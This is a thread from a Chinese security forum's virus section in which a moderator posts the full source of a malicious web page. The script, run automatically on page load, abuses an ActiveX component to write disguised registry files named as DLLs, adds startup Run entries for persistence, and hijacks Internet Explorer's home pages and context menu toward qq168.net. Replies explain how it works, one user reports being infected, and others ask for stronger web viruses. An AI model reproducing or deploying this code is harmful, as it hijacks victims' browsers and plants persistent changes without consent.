|
 | 作者: bedlamite [bedlamite]
 版主 |
登录 |
| ..................................................... <html><script language=""> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent.class></APPLET>"); function runcmd() { a=document.applets[0]; a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}'); a.createInstance(); Shl=a.GetObject(); a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}'); a.createInstance(); fso=a.GetObject(); var wf1=fso.CreateTextFile("c:\\windows\\system\\systel.dll",true); wf1.writeLine('REGEDIT4'); wf1.WriteBlankLines(1); wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]'); wf1.WriteLine('"Start Page"="http://www.qq168.net"'); wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); wf1.WriteLine('"Local Page"="http://www.qq168.net"'); wf1.WriteBlankLines(1); wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]'); wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); wf1.WriteBlankLines(1); wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]'); wf1.WriteLine('"Start Page"="http://www.qq168.net"'); wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); wf1.WriteLine('"Local Page"="http://www.qq168.net"'); wf1.WriteBlankLines(1); wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]'); wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]'); wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"'); wf1.WriteBlankLines(1); wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]'); wf1.WriteLine('"Start Page"="regedit -s c:\\windows\\system\\systel.dll"'); wf1.WriteBlankLines(1); wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]'); wf1.WriteLine('"Start Page"="http://www.qq168.net"'); wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); wf1.WriteLine('"Local Page"="http://www.qq168.net"'); wf1.Close(); var wf1=fso.CreateTextFile("c:\\windows\\system.dll",true); wf1.writeLine('REGEDIT4'); wf1.WriteBlankLines(1); wf1.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main]'); wf1.WriteLine('"Start Page"="http://www.qq168.net"'); wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); wf1.WriteLine('"Local Page"="http://www.qq168.net"'); wf1.WriteBlankLines(1); wf1.writeLine('[HKLM\\Software\\Microsoft\\Internet Explorer\\Main]'); wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); wf1.WriteBlankLines(1); wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]'); wf1.WriteLine('"Start Page"="http://www.qq168.net"'); wf1.WriteLine('"First Home Page"="http://www.qq168.net"'); wf1.WriteLine('"Default_Page_URL"="http://www.qq168.net"'); wf1.WriteLine('"Local Page"="http://www.qq168.net"'); wf1.WriteBlankLines(1); wf1.writeLine('[-HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]'); wf1.writeLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Run]'); wf1.WriteLine('@="regedit -s c:\\\\windows\\\\system.dll"'); wf1.WriteBlankLines(1); wf1.writeLine('[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]'); wf1.WriteLine('"win"="regedit -s c:\\\\windows\\\\system\\\\systel.dll"'); wf1.WriteBlankLines(1); wf1.WriteLine('rcx'); wf1.Close(); Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "regedit -s c:\\windows\\system\\systel.dll"); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Start Pagewin", "regedit -s c:\\windows\\system\\systel.dll"); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\win1", "regedit -s c:\\windows\\system.dll"); Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net"); Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.qq168.net"); Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\First Home Page", "http://www.qq168.net"); Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page","http://www.qq168.net"); Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\☆♀精彩网站♀☆\\", "http://www.qq168.net"); Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\�t☆顶级DJ舞曲☆�s\\", "http://www.qq168.net"); } setTimeout('runcmd()',1000); </script> ............................................. |
| 地主 发表时间: 04/26 09:41 |
 | 回复: z7 [skyzz]  论坛用户 |
登录 |
|
详细解释一下 system.dll的用处 |
| B1层 发表时间: 05/01 09:25 |
 | 回复: CyberSpy [cyberspy]  论坛用户 |
登录 |
|
详细解释一下 system.dll的用处 其实就是一个vbs文件嘛,你用记事本打开看看内容就知道了! 修改注册表达到改主页、开机自动运行等作用 |
| B2层 发表时间: 05/01 16:14 |
 | 回复: ma2751_cn [ma2751_cn] |
登录 |
|
在电脑生成一个system.dll文件,修改注册表开机启动。其实system.dll就是一个伪装的VBS文件~~~ |
| B3层 发表时间: 05/02 03:42 |
 | 回复: iloveleon [iloveleon]  论坛用户 |
登录 |
|
我中彪了 QQ不能正常用 到底怎么改? 救命啊! |
| B4层 发表时间: 05/04 20:55 |
 | 回复: aserict [aserict] 论坛用户 |
登录 |
|
还有没有更厉害的呀。比如说极限女孩这样的网页病毒 |
| B5层 发表时间: 03-12-23 19:35 |
 | 回复: newmyth21 [newmyth21] 论坛用户 |
登录 |
这个我狂顶了。 |
| B6层 发表时间: 03-12-23 19:37 |
 | 回复: moley [moley]  论坛用户 |
登录 |
|
顶!!!!!!!!!!!!!!!!狂! |
| B7层 发表时间: 03-12-23 20:14 |
| 回复: moley [moley] 论坛用户 |
登录 |
|
顶!!!!!!!!!!!!!!!!狂! |
| B8层 发表时间: 03-12-23 20:14 |
| 回复: moley [moley] 论坛用户 |
登录 |
|
顶!!!!!!!!!!!!!!!!狂! |
| B9层 发表时间: 03-12-23 20:15 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 一个恶意网页的代码